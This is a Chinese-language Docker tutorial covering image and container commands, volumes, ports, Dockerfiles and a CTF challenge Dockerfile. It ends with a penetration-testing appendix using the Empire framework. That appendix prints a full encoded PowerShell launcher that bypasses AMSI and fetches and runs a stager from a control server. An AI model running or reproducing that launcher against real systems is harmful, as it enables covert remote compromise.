Docker笔记

概念

Docker镜像：一个只读模板，是创建Docker容器的基础。镜像文件是由多个层组成的。

Docker容器：一个轻量级沙箱，来运行和隔离应用

Docker仓库：用来存储Docker镜像文件的地方

Docker中用于区分的方式是id或者name:tag

安装

官方文档：https://docs.docker.com/

操作镜像

1.获取镜像（默认是从docker hub网站进行镜像的获取）

docker pull kalilinux/kali-linux-docker
#如果想使用非官方仓库需要指定仓库完整的地址
docker pull hub.c.163.com/public/ubuntu:14.04

建议：使用中科大镜像源 https://docker.mirrors.ustc.edu.cn

附带：在国内 docker build 的正确姿势

2.列出镜像

➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB

REPOSITORY:来自哪个仓库

TAG:镜像的标签信息，能标示来自同一仓库的不同镜像

IMAGE ID:镜像的ID，此字段唯一标示了镜像

CREATED:创建时间

SIZE:镜像的大小

3.添加镜像标签

#对kalilinux/kali-linux-docker:latest添加新的标签kalilinux:latest
➜  ~ docker tag kalilinux/kali-linux-docker:latest kalilinux:latest
#别名不一样但是两者的镜像文件是一样的（id相同）
➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB
kalilinux                     latest              8ececeaf404d        9 months ago        1.56GB

4.查看详细信息

➜  ~ docker inspect kalilinux:latest
[
    {
        "Id": "sha256:8ececeaf404d5d63d4e9bf870f4340516f3be040e5db6c005ac8cf96d2c43536",
        "RepoTags": [
            "kalilinux/kali-linux-docker:latest",
            "kalilinux:latest"
        ],
        "RepoDigests": [
            "kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d"
        ],
        ......
        "Metadata": {
            "LastTagTime": "2017-12-02T04:56:53.8185955Z"
        }
    }
]

5.查看镜像历史

➜  ~ docker history kalilinux:latest
IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
8ececeaf404d        9 months ago        /bin/sh -c #(nop)  CMD ["/bin/bash"]            0B
<missing>           9 months ago        /bin/sh -c apt-get -y update && apt-get -y...   251MB
<missing>           9 months ago        /bin/sh -c #(nop)  ENV DEBIAN_FRONTEND=non...   0B
<missing>           9 months ago        /bin/sh -c echo "deb http://http.kali.org/...   134B
<missing>           9 months ago        /bin/sh -c #(nop)  MAINTAINER steev@kali.org    0B
<missing>           11 months ago       /bin/sh -c #(nop)  CMD ["/bin/bash"]            0B
<missing>           11 months ago       /bin/sh -c apt-get -y update && apt-get -y...   286MB

6.搜索镜像

#搜索所有自动创建的评价为1+的带kali关键字的镜像
➜  ~ docker search --automated -s 3 kali
Flag --automated has been deprecated, use --filter=is-automated=true instead
Flag --stars has been deprecated, use --filter=stars=3 instead
NAME                           DESCRIPTION                                     STARS               OFFICIAL            AUTOMATED
kalilinux/kali-linux-docker    Kali Linux Rolling Distribution Base Image      361                                     [OK]
linuxkonsult/kali-metasploit   Kali base image with metasploit                 54                                      [OK]
jasonchaffee/kali-linux        Kali Linux Docker Container with the kali-...   8                                       [OK]
brimstone/kali                                                                 6                                       [OK]
adamoss/kali2-metasploit       Kali2 Automated Build                           4                                       [OK]
wsec/kali-metasploit           Official Kali Base image + Metasploit           3                                       [OK]
kalinon/comicstreamer          ComicStreamer is a media server app for sh...   3                                       [OK]

7.删除镜像

#如果同一个标签有多个tag，那么docker rmi只是删除tag而已
#如果docker rmi id的话，会先删除所有的tag然后删除镜像
#但是若该镜像的容器存在，也是无法删除的，如果想强制删除可以使用docker rmi -f id
➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB
kalilinux                     latest              8ececeaf404d        9 months ago        1.56GB
➜  ~ docker rmi kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d
➜  ~ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
kalilinux           latest              8ececeaf404d        9 months ago        1.56GB

8.创建镜像

1）基于已有镜像的容器创建

#我们先创建容器并安装metasploit-framework
➜  ~ docker run -it kalilinux:latest /bin/bash
root@de573c5f5dc6:/# apt update && apt install metasploit-framework
root@de573c5f5dc6:/#exit
#记住id为de573c5f5dc6
#docker commit -m "改动信息" -a "作者名称" id REPOSITORY:TAG
➜  ~ docker commit -m "install msf" -a "zeroyu" de573c5f5dc6 kalilinux:0.1
sha256:66a6770d79d88c826b2e4a38b98037c14de0b9d2ce897307dc30afbf675ce51a
➜  ~ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
kalilinux           0.1                 66a6770d79d8        21 seconds ago      2.54GB
kalilinux           latest              8ececeaf404d        9 months ago        1.56GB

2）基于本地模板导入

docker import ...

9.存出和载入镜像

1）存出镜像

docker save -o docker_for_msf.tar kalilinux:0.1

2）载入镜像

docker load --input docker_for_msf.tar
#或则
docker load < docker_for_msf.tar

10.上传镜像

docker push kalilinux:0.1

操作容器

1.创建容器

1）新建容器

#docker create新建的容器处于静止，可以使用docker start来启动它
#-i 保持标准输入打开   -t分配一个伪终端
➜  ~ docker create -it kalilinux:0.1
2bc48b88a424c8056fe9e6311848d5850c4e46008feec99ee095bc341ae9adaf
#查看处于终止状态的容器
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                   PORTS               NAMES
2bc48b88a424        kalilinux:0.1       "/bin/bash"         7 seconds ago       Created                                      frosty_poitras
de573c5f5dc6        kalilinux:latest    "/bin/bash"         5 hours ago         Exited (0) 5 hours ago                       happy_goldberg

2）启动容器

#docker start id 启动相应的容器
#docker ps 查看运行中的容器
➜  ~ docker start 2bc48b88a424
2bc48b88a424
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
2bc48b88a424        kalilinux:0.1       "/bin/bash"         9 minutes ago       Up 8 seconds                            frosty_poitras

3）新建并启动容器

#docker run = docker create + docker start
#run的过程：1.检查镜像是否存在，不存在就下载；2.用镜像创建容器；挂载可读写层；3.分配虚拟接口
#4.分配IP；5.运行指定程序；6.执行完自动终止
➜  ~ docker run kalilinux:0.1 /bin/echo 'zeroyu'
zeroyu
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND              CREATED             STATUS                     PORTS               NAMES
d6a6045c4f8b        kalilinux:0.1       "/bin/echo zeroyu"   3 minutes ago       Exited (0) 3 minutes ago                       cocky_kirch
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
#常用命令如下
➜  ~ docker run -it kalilinux:0.1 /bin/bash
root@2ed8aa5354f1:/# ps
  PID TTY          TIME CMD
    1 pts/0    00:00:00 bash
    7 pts/0    00:00:00 ps
root@2ed8aa5354f1:/# exit
exit
#退出后自动处于终止状态
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND              CREATED              STATUS                      PORTS               NAMES
2ed8aa5354f1        kalilinux:0.1       "/bin/bash"          About a minute ago   Exited (0) 48 seconds ago                       goofy_bardeen

4）守护态运行

#在后台运行容器
➜  ~ docker run -d kalilinux:0.1 /bin/sh -c "while true ; do echo zeroyu ; sleep 1 ; done"
88f12c0725a466ba6d8f08f34fc8e9ac263ecafdff0a9e7282d7e9bb4073e6a0
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
88f12c0725a4        kalilinux:0.1       "/bin/sh -c 'while..."   7 seconds ago       Up 7 seconds                            sleepy_kowalevski
➜  ~ docker logs 88f12c0725a4
zeroyu
zeroyu
zeroyu
......

2.终止容器

#id为88f12c0725a4但是可以使用前几位来简单表示
➜  ~ docker stop 88
88
#查看所有处于终止态的id
➜  ~ docker ps -qa
073ff4e1dac7
#处于终止状态可以使用start来重新启动
➜  ~ docker start 073
073
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
073ff4e1dac7        kalilinux:0.1       "/bin/sh -c 'while..."   About a minute ago   Up About a minute                       cranky_benz
#restart可以先终止再重新启动
➜  ~ docker restart 073
073

3.进入容器

处于守护态（-d参数）的容器会在后台运行，但是你无法到信息，也无法进行操作。此时，要进入容器进行工作，要使用attach或者exec命令。

1） 使用attach命令

#容器还可以使用name来唯一辨识
➜  ~ docker run -itd kalilinux:0.1
77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         20 seconds ago      Up 21 seconds                           stupefied_gates
➜  ~ docker attach stupefied_gates
root@77e93d18a6a5:/#

2）使用exec命令

➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                          PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         5 minutes ago       Exited (0) About a minute ago                       stupefied_gates
➜  ~ docker start 77e
77e
➜  ~ docker exec -it 77e93d18a6a5 /bin/bash
root@77e93d18a6a5:/#

4.删除容器

➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         7 minutes ago       Up About a minute                       stupefied_gates
➜  ~ docker rm 77e93d18a6a5
Error response from daemon: You cannot remove a running container 77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360. Stop the container before attempting removal or force remove
➜  ~ docker stop 77e93d18a6a5
77e93d18a6a5
➜  ~ docker rm 77e93d18a6a5
77e93d18a6a5

5.导入和导出容器

#导出容器
#无论这个容器是否正在运行都是可以导出的
➜  ~ docker export -o test.tar 77e93d18a6a5
#或者执行
➜  ~ docker export 77e93d18a6a5 > test.tar 

#导入容器
➜  ~ docker import test.tar - test/kalilinux:v1.0

Docker数据管理

#使用-v标记挂在本地的tmp目录到容器中的/opt/tmp_test
#使用rw（默认也是这种方式）来指定可读写
#下面的#表示的不是注释
➜  ~ docker run -it -P  --name db -v /tmp:/opt/tmp_test:rw kalilinux:0.1 /bin/sh
# ls
bin  boot  dev	etc  home  lib	lib64  media  mnt  opt	proc  root  run  sbin  srv  sys  tmp  usr  var
# cd opt
# ls
tmp_test
# cd tmp_test
# ls
com.apple.launchd.0fGM76e6ao  com.apple.launchd.UWfVYRXkwo  powerlog
com.apple.launchd.AkQGotnulN  pip-FfQw68-unpack		    zeroyu.txt
#

Docker端口映射

#-P是指映射到任意端口
#-p加端口号(本地端口:远程端口=>0.0.0.0:8080:80)，则将端口映射到所有地址的相应端口
➜  ~ docker run -it -d -p 5000:5000 kalilinux:v0.2
23e91a40cb124720b1dba81371a275169124cbff2778120b4350470fa79a0d91
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                    NAMES
23e91a40cb12        kalilinux:v0.2      "/bin/bash"         12 seconds ago      Up 11 seconds       0.0.0.0:5000->5000/tcp   boring_volhard
➜  ~ docker attach boring_volhard
root@23e91a40cb12:/# cd home/Empire/
root@23e91a40cb12:/home/Empire# ls
LICENSE  README.md  changelog  data  empire  lib  setup
root@23e91a40cb12:/home/Empire#

Dockerfile

Dockerfile基本语句的说明

FROM <image:版本标签>：该 image 文件继承某个镜像 image，冒号表示标签，这里标签是8.4，即8.4版本的 node。

MAINTAINER <name> <email> :描述镜像的创建者，名称和邮箱

COPY .[directory]：将当前目录下的所有文件（除了.dockerignore排除的路径），都拷贝进入 image 文件的 directory 目录。

ADD  源路径 目标路径 :将主机构建环境（上下文）目录中的文件和目录、以及一个URL标记的文件 拷贝到镜像中。与COPY相比ADD可以自动解压，也可以复制网络文件。路径不存在会自动创建。

WORKDIR [directory]：指定接下来的工作路径为 directory。

RUN [cmd]：在/app目录下，运行[cmd]命令安装依赖。注意，安装后所有的依赖，都将打包进入 image 文件。

EXPOSE [port]：将容器 port 端口暴露出来， 允许外部连接这个端口。在docker run -p的时候生效。

VOLUME ["path"] : 在主机上创建一个挂载，挂载到容器的指定路径。docker run -v命令也能完成这个操作，而且更强大。这个命令不能指定主机的需要挂载到容器的文件夹路径。但docker run -v可以，而且其还可以挂载数据容器。

CMD [cmd]：在容器启动后自动执行 [cmd] 命令(只会出现一次)

EVN <key> <value> : 只能设置一个，设置容器的环境变量，可以让其后面的RUN命令使用，容器运行的时候这个变量也会保留。

CTF中的Dockerfile实例展示

#Hitcon 2017 web baby^h-master-php-2017
#
#read_secret输出OrangeOrangeOrange
#MaxConnectionsPerChild为100
#其余环境与题目大致无异
#如要修改root与题目用户密码请用 [docker exec -it '你的应用名称' /bin/bash] 进入容器修改

#整合 apache php7
FROM pr0ph3t/lap7
MAINTAINER Pr0ph3t <1415314884@qq.com>

#Install crontab and perl with LWP
RUN apt-get update -y && apt-get install cron -y

#Init crontab , 每天凌晨4点清空data文件夹
RUN echo '0 4 * * * root rm -rf /var/www/data/*' >> /etc/crontab

#Init challenge
ADD index.php /var/www/html/
ADD readflag /read_flag
ADD read_secret /read_secret
ADD avatar-1.gif /var/www/html/avatar.gif

RUN chmod u+s /read_flag
RUN rm -rf /var/www/html/index.html
RUN mkdir /var/www/data
RUN chown www-data /var/www/data
RUN chmod -R 775 /var/www/data
RUN echo 'hitcon{Th3 d4rk fl4m3 PHP Mast3r}' > /flag
RUN chmod 700 /flag

#Configure the apache2
RUN sed 's/Indexes //' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.new
RUN sed 's/MaxConnectionsPerChild   0/MaxConnectionsPerChild   100/' /etc/apache2/mods-available/mpm_prefork.conf > /etc/apache2/mods-available/mpm_prefork.conf.new
RUN mv /etc/apache2/apache2.conf.new /etc/apache2/apache2.conf
RUN mv /etc/apache2/mods-available/mpm_prefork.conf.new /etc/apache2/mods-available/mpm_prefork.conf
RUN echo '<Directory "/var/www/data">\n\tphp_flag engine off\n</Directory>' >> /etc/apache2/sites-enabled/000-default.conf

#Create run.sh
ADD run.sh /
RUN chmod +x /run.sh


#Expose http service
EXPOSE 80
CMD ["bash -x /run.sh"]

Dockerfile的使用方式

进入Dockerfile目录
[docker build -t '自定义镜像名字' . ] //最后的.别少了
[docker run -id --name '你的应用名称' -p 外部端口:80 -m '内存限制 如1g、500m' '你的自定义镜像名称' /run.sh]

附例

在vps中的docker上使用empire进行渗透测试(metasploit同理)

#端口映射参考上条
================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > help

Commands
========
agents            Jump to the Agents menu.
creds             Add/display credentials to/from the database.
exit              Exit Empire
help              Displays the help menu.
interact          Interact with a particular agent.
list              Lists active agents or listeners.
listeners         Interact with active listeners.
load              Loads Empire modules from a non-standard folder.
preobfuscate      Preobfuscate PowerShell module_source files
reload            Reload one (or all) Empire modules.
reset             Reset a global option (e.g. IP whitelists).
resource          Read and execute a list of Empire commands from a file.
searchmodule      Search Empire module names/descriptions.
set               Set a global option (e.g. IP whitelists).
show              Show a global option (e.g. IP whitelists).
usemodule         Use an Empire module.
usestager         Use an Empire stager.

(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://172.17.0.2:80             Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        3ab47284cf7e260541d810beb54d3405 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set Name docker
#此处的172.16.188.1为vps的ip地址
(Empire: listeners/http) > set Host http://172.16.188.1:5000
(Empire: listeners/http) > execute
[*] Starting listener 'docker'
[+] Listener successfully started!
(Empire: listeners/http) > lsit
*** Unknown syntax: lsit
(Empire: listeners/http) > back
(Empire: listeners) > list

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  docker            http            http://172.16.188.1:5000             5/0.0

(Empire: listeners) > usestager
multi/bash                osx/dylib                 osx/teensy                windows/launcher_sct
multi/launcher            osx/jar                   windows/bunny             windows/launcher_vbs
multi/pyinstaller         osx/launcher              windows/dll               windows/macro
multi/war                 osx/macho                 windows/ducky             windows/macroless_msword
osx/applescript           osx/macro                 windows/hta               windows/teensy
osx/application           osx/pkg                   windows/launcher_bat
osx/ducky                 osx/safari_launcher       windows/launcher_lnk
(Empire: listeners) > usestager windows/d
dll    ducky
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x64               Architecture of the .dll to generate
                                                 (x64 or x86).
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Listener docker
(Empire: stager/windows/dll) > back
(Empire: listeners) > launcher powershell docker
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAcwBpAE8AbgBUAEEAYgBMAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAAUwA9AFsAUgBFAGYAXQAuAEEAcwBzAEUATQBCAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBFAFQAVgBBAGwAdQBlACgAJABOAFUAbABsACkAOwBJAGYAKAAkAEcAUABTAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAA7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0ARQBMAHMAZQB7AFsAUwBDAHIAaQBQAFQAQgBsAG8AYwBrAF0ALgAiAEcARQBUAEYASQBFAGAAbABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAGwALAAoAE4AZQBXAC0ATwBCAGoAZQBDAFQAIABDAG8ATABsAEUAYwBUAGkAbwBOAHMALgBHAEUATgBlAFIAaQBDAC4ASABBAHMASABTAEUAVABbAFMAdAByAEkAbgBHAF0AKQApAH0AWwBSAEUAZgBdAC4AQQBzAFMARQBtAEIATAB5AC4ARwBFAFQAVAB5AFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAQQBMAFUAZQAoACQAbgB1AGwAbAAsACQAVABSAHUAZQApAH0AOwB9ADsAWwBTAFkAcwB0AEUAbQAuAE4ARQB0AC4AUwBFAFIAdgBpAEMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8AbgB0AGkAbgBVAEUAPQAwADsAJAB3AEMAPQBOAGUAVwAtAE8AQgBqAGUAQwB0ACAAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBiAEMATABJAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBDAC4ASABFAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAE8AWABZAD0AWwBTAFkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAUgBFAFEAVQBlAFMAVABdADoAOgBEAEUAZgBBAHUAbABUAFcAZQBCAFAAcgBPAFgAeQA7ACQAdwBDAC4AUABSAG8AWABZAC4AQwByAGUAZABFAG4AdABpAGEATABzACAAPQAgAFsAUwBZAFMAdABlAE0ALgBOAGUAVAAuAEMAcgBlAGQAZQBuAFQASQBhAGwAQwBhAGMASABlAF0AOgA6AEQAZQBGAGEAVQBMAFQATgBFAFQAVwBvAHIASwBDAHIAZQBEAEUATgB0AEkAYQBMAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUATQAuAFQAZQB4AFQALgBFAE4AQwBPAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAFQAZQBTACgAJwAzAGEAYgA0ADcAMgA4ADQAYwBmADcAZQAyADYAMAA1ADQAMQBkADgAMQAwAGIAZQBiADUANABkADMANAAwADUAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwAxADcAMgAuADEANgAuADEAOAA4AC4AMQA6ADUAMAAwADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABFAEEAZABlAHIAUwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AUgAvAGoAMwAxAEkAYwBRAGQAZQAzAEYANwB2AGoAWABYADIAbgBwADYARQAyAFcAcQBiAGMAPQAiACkAOwAkAEQAYQBUAEEAPQAkAFcAQwAuAEQAbwBXAE4AbABvAEEARABEAGEAVABBACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAEQAQQBUAGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAQQB0AGEAWwA0AC4ALgAkAEQAQQB0AGEALgBsAGUATgBHAHQASABdADsALQBKAE8AaQBuAFsAQwBIAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
#在目标机器上执行上面的payload就可以得到下面的反弹
(Empire: listeners) > [+] Initial agent G3BYNCLW from 172.17.0.1 now active (Slack)